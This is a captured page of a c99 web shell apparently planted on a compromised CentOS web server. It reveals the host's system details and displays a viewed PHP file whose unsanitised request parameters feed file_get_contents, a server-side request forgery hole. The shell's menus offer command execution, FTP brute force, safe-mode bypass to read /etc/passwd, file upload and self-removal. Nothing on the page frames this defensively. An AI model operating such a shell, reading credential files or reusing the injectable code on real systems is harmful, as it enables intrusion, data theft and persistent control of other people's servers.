!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/service/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     eoffice2info.php (310 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/mistk/service/eoffice2info.php
Size 310 B
MD5 46915465ef0bae63db7c2ea9a82858cc
Owner/Group root/root
Perms-rw-r--r--
Create time 21/10/2013 18:53:30
Access time 31/07/2024 18:07:12
MODIFY time 08/05/2013 09:52:32

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
3C 3F 70 68 70 0A 69 6E 63 6C 75 64 65 20 22 2E 2E 2F 69 6E 66 6F 2F 69
6E 66 6F 73 79 73 5F 67 6C 6F 62 61 6C 2E 70 68 70 22 3B 0A 24 77 65 62
75 72 6C 20 3D 20 28 21 20 69 73 73 65 74 28 24 5F 52 45 51 55 45 53 54
5B 27 77 65 62 75 72 6C 27 5D 29 3F 20 22 22 20 3A 20 24 5F 52 45 51 55
45 53 54 5B 27 77 65 62 75 72 6C 27 5D 29 3B 0A 24 70 73 49 64 20 3D 20
28 21 20 69 73 73 65 74 28 24 5F 52 45 51 55 45 53 54 5B 27 70 73 49 64
27 5D 29 3F 20 22 22 20 3A 20 24 5F 52 45 51 55 45 53 54 5B 27 70 73 49
64 27 5D 29 3B 0A 65 63 68 6F 20 66 69 6C 65 5F 67 65 74 5F 63 6F 6E 74
65 6E 74 73 28 27 68 74 74 70 3A 2F 2F 27 2E 24 47 4C 4F 42 41 4C 53 5B
22 48 4F 53 54 5F 4E 41 4D 45 22 5D 2E 24 77 65 62 75 72 6C 2E 27 65 6F
66 66 69 63 65 2F 61 64 6D 69 6E 2F 63 68 65 63 6B 44 6F 63 32 2E 70 68
70 27 2E 27 3F 70 65 72 73 6F 6E 49 64 3D 27 2E 24 70 73 49 64 2E 27 26
77 65 62 75 72 6C 3D 27 2E 24 77 65 62 75 72 6C 29 3B 0A 0A 3F 3E
<?php include "../info/i
nfosys_global.php"; $web
url = (! isset($_REQUEST
['weburl'])? "" : $_REQU
EST['weburl']); $psId = 
(! isset($_REQUEST['psId
'])? "" : $_REQUEST['psI
d']); echo file_get_cont
ents('http://'.$GLOBALS[
"HOST_NAME"].$weburl.'eo
ffice/admin/checkDoc2.ph
p'.'?personId='.$psId.'&
weburl='.$weburl);  ?>

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0071 ]--